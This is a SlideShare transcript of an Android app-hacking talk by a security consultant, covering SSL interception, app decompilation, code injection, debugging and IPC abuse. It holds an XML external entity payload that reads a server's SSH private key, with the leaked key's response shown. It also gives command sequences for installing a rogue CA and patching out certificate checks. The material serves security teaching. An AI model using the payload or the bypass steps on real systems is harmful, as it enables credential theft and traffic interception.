• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
How We Tear into that Little Green Man by Mathew Rowley
 

How We Tear into that Little Green Man by Mathew Rowley

on

  • 1,435 views

How We Tear into that Little Green Man by Mathew Rowley

How We Tear into that Little Green Man by Mathew Rowley

Statistics

Views

Total Views
1,435
Views on SlideShare
1,435
Embed Views
0

Actions

Likes
0
Downloads
0
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    How We Tear into that Little Green Man by Mathew Rowley How We Tear into that Little Green Man by Mathew Rowley Presentation Transcript

    • A blackhat’s toolchest: How we tear into that little green manWednesday, June 20, 12
    • Who is you?! Mathew Rowley (@wuntee) Senior security consultant at MatasanoWednesday, June 20, 12
    • AgendaWednesday, June 20, 12
    • wuntee?Wednesday, June 20, 12
    • Quick background • APK - Android PacKage • This is what is downloaded when you install an app • file: Zip archive data, at least v2.0 to extract • Classes.dex - Dalvik bytecode • AndroidManifest.xml - Provides OS information about the applicationWednesday, June 20, 12
    • Quick background • Smali/Baksmali • smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Androids Java VM implementation. The syntax is loosely based on Jasmins/dedexers syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.) • Set of tools that you can decompile Android applications with, then re-compile them.Wednesday, June 20, 12
    • Wednesday, June 20, 12
    • Tools Mentioned • Otertool - Tool I wrote • apktool - smali/baksmali wrapper • Mercury - Tool to interact with IPC locally • Eclipse - Java IDE, includes Java debugger • JD-GUI - Java decompiler • dex2jar - Converts a dex file to a jar fileWednesday, June 20, 12
    • technique numero uno MITMWednesday, June 20, 12
    • SSL • By default SSL certificate checking is performed by the Android OS • Optionally, developers can add or override those checks with their own • This presents two problems when attempting to MITM an SSL communication streamWednesday, June 20, 12
    • Circumventing OS checks • Install the CA. • There is no interface for doing this. • Demos...Wednesday, June 20, 12
    • Wednesday, June 20, 12
    • For reference But it must be easier... $ cd $JAVA_HOME/lib/ext $ sudo wget http://www.bouncycastle.org/download/bcprov-jdk15on-147.jar $ cd - $ adb pull /system/etc/security/cacerts.bks $ keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -importcert - trustcacerts -alias idontcare -file ca.cer $ adb shell mount | grep system $ adb shell mount -o remount,rw /dev/block/mtdblock0 /system $ adb shell chmod 777 /system/etc/security/cacerts.bks $ adb push carerts.bks /system/etc/security/cacerts.bks $ adb shell chmod 644 /system/etc/sercurity/cacerts.bksWednesday, June 20, 12
    • Wednesday, June 20, 12
    • Caveats • Emulator • Does not persist changes to the .img file. Bug reported, was supposed to be fixed in r17 • Can be done with unyaffs/mkyaffs2image • Ice Cream Sandwitch • Switched from BouncyCastle to a directory of x509 text certificatesWednesday, June 20, 12
    • Circumventing custom developer certificate checks • This is done by extending X509TrustManager • (void) checkServerTrusted(...) • Modify APK using baksmali, re-smali, re- package, re-sign • Time intensive • No interface • Demos...Wednesday, June 20, 12
    • Wednesday, June 20, 12
    • For Reference. But it must be easier... $ java -jar apktool.jar d X509ModfiedSSL.apk $ grep -ri x509 * | grep -i implements -- Edit file to have checkServerTrusted return void $ java -jar apktool.jar b X509ModifiedSSL X509ModifiedSSL-mod.apk $ keytool -genkey -v -keystore keystore.ks -alias idontcare -keyalg RSA - keysize 2048 -validity 10000 $ jarsigner -keystore keystore.ks X509ModifiedSSL-mod.apk idontcare $ adb install X509ModifiedSSL-mod.apkWednesday, June 20, 12
    • Wednesday, June 20, 12
    • I have SSL MITM, now what? • This will typically be used to attack backend infrastructure, not the device • Backend servers typically expect sanitized input, and dont expect non-device interaction. • What I have seen: • 101 read/write of arbitrary files through SOAP interface • XML entity inclusion to gain access to private ssh key • Ability to arbitrarily lock/wipe another persons deviceWednesday, June 20, 12
    • XML Entity inclusion in CRM applicationWednesday, June 20, 12
    • XML entity inclusion Malicious request <!DOCTYPE foo [<!ENTITY gimme SYSTEM "file:///home/admin/.ssh/ id_rsa"> ]> <DeviceRequest> <Header> <ClientId>Android&gimme;</ClientId> <UserId>mathew</UserId> <Token></Token> <RequestId>07/07/2011 07:07:07 AM</RequestId> <TransactionName>ANY-EVENT</TransactionName> </Header> <Body></Body> </DeviceRequest>Wednesday, June 20, 12
    • XML entity inclusion Response <?xml version=1.0 encoding=UTF-8?> <DeviceResponse> <Header> <ClientId> Android-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAztSmfJBDtIUAubiYuOniQ6BomBBbsoZPLKLM75qWZ5VoVyoV … TSN3IA6UYyfCQs2VCU5Go197Hw+hxoNqovE+bGAUO9RYhUfoehCHdAUDRAu8H8oU Ts/0C+walTrXRPRozQUk3h6UDcAo42KLybuxufZWTn/XQ2/nVVwv== -----END RSA PRIVATE KEY----- </ClientId> ...Wednesday, June 20, 12
    • XML entity inclusion • Files pulled to obtain ssh key: • /etc/passwd • /opt/apache/crm/ • /opt/apache/crm/bin • /opt/apache/crm/bin/start-crm.sh - starts as admin • /home/admin/.ssh/id_rsa • Think that private key was used anywhere else?Wednesday, June 20, 12
    • Conclusion/Prevention • Conclusion • Arbitrary filesystem access as admin user • Remote access to server • Prevention • Do not trust application input!Wednesday, June 20, 12
    • technique numero dos Static analysisWednesday, June 20, 12
    • Setup • unzip -> unzip directory • baksmali -> unapk directory • dex2jar -> jar directory • JD-GUI -> src directoryWednesday, June 20, 12
    • Reference Script #!/bin/bash # Scripts apktool="/Applications/hacking/apktool-install-macosx-r04-brut1/apktool" dex2jar="/Applications/hacking/dex2jar-0.0.9.7/dex2jar.sh" jdgui="/Applications/JD-GUI.app/Contents/MacOS/jd-gui" apk=$1 mkdir jar src unapk unzip # Unzip pushd unzip unzip ../$apk popd # Unapk pushd unapk $apktool d -f ../$apk . popd # Get jar $dex2jar $apk mv *.jar ./jar # Decompile $jdgui jar/*.jarWednesday, June 20, 12
    • Example Skypes hidden menu • Logcat... What is skype.properties?Wednesday, June 20, 12
    • Obfuscation • Default configurations for Eclipse projects • Commercial products • Makes things a lost harder to reverse • Skype is aggressively obfuscated.Wednesday, June 20, 12
    • Locate string “skype.properties” • grep is your friend • Notice how it is only located in .smali files • What about .java?Wednesday, June 20, 12
    • Wednesday, June 20, 12
    • skype.properties processing login=Boolean daemon=Boolean update=Boolean answer=Boolean callVoiceMailDelay=Integer videoQualityLow=Integer userWantsVideo=Boolean checkSharedXML=Boolean kit.logging=Boolean debugMenu=Boolean test.monkey.enabled=Boolean test.acs.enabled=Boolean test.video=Boolean test.skypename=String test.password=String videoInfo=StringWednesday, June 20, 12
    • The test... • Create skype.properties with “debugMenu=1” and place it on SD cardWednesday, June 20, 12
    • Logging...Wednesday, June 20, 12
    • HackersChallenge...Wednesday, June 20, 12
    • HackersChallenge... • Challenge for Matasano coworkers - nobody has completed (attempted?) it • “Tamper proof” by sending a custom hash of itself with every request • Performs an HTTPS request to get a “secret” of a character from the movie Hackers, then displays it • Goal is to figure out everyones secretWednesday, June 20, 12
    • technique numero tres Modifying an applicationWednesday, June 20, 12
    • Wednesday, June 20, 12
    • Injecting Java source to APK • Dalvik bytecode can be decompiled to smali, modified and recompiled... • Arbitrary Java can be compiled into Dalvik bytecode • Combine the two, you can insert arbitrary Java into an APK... • Things you must know when modifying • Smali code from custom Java • Calling convention of Smali • Demo - modify HackersChallenge to log custom hash valueWednesday, June 20, 12
    • Wednesday, June 20, 12
    • So what? • Simple example of injecting arbitrary Java into an Android application • Malware? • Debugging obfuscation? • Control circumvention aka “cracks”? • You can inject any Java source into ANY application!Wednesday, June 20, 12
    • technique numero quatro Debugging applications without sourceWednesday, June 20, 12
    • Debugging • System.out.println(debug_info) or attach to a debugger? • Android applications are debugged via the typical Java Platform Debug Architecture (JPDA) • Interacting with an Android application • Eclipse - GUI • JDB - command line • Java JPDA API • Ruby/JRuby with jdi-hook • Caveats • You need to know “where” you must breakpoint • Benefits • See method arguments and return values • HackersChallenge? • Demo - debug HackersChallenge to view custom hash valueWednesday, June 20, 12
    • Wednesday, June 20, 12
    • Ok... And? • Debugging is a key reversing concept • Relate this to debugging using GDB or ImmunityDebugger/Ollydbg • Not only can you break on local methods, but you can on core Android methods as well. Ever want to see all IPC? • Break: android.content.Intent.<init>Wednesday, June 20, 12
    • technique numero cinco Exploiting IPCWednesday, June 20, 12
    • Exploiting IPC • An application with 0 extra privileges can do MUCH more than you think... • Open IPC channels can act as a proxy for extra functionality • Mercury: https://media.blackhat.com/bh-eu-12/ Erasmus/bh-eu-12-Erasmus-Heavy- Metal_Poisoned_Droid-Slides.pdf $ for x in `find . -name *.apk`; do aapt=`aapt d xmltree $x AndroidManifest.xml`; prov=`echo $aapt | grep -A3 E: provider`; if [ "$prov" != "" ]; then echo $x; fi; done | wc -l 64Wednesday, June 20, 12
    • otertoolWednesday, June 20, 12
    • Live File Browser sqlite/text/hexWednesday, June 20, 12
    • FSDiffWednesday, June 20, 12
    • Java to SmaliWednesday, June 20, 12
    • Visual AndroidManifest.xmlWednesday, June 20, 12
    • Future of Otertool • Automated debugger functionality • Show all calls/args to method x • Show all variables in method before return • Handle AndroidManifest.xml file and other resources • Feature suggestions, bugs? ->githubWednesday, June 20, 12
    • Questions? mathew rowley @wuntee mathew@matasano.com otertool current release https://github.com/wuntee/otertool/tree/master/release/current videos/slides http://67.219.122.21/shakacon/Wednesday, June 20, 12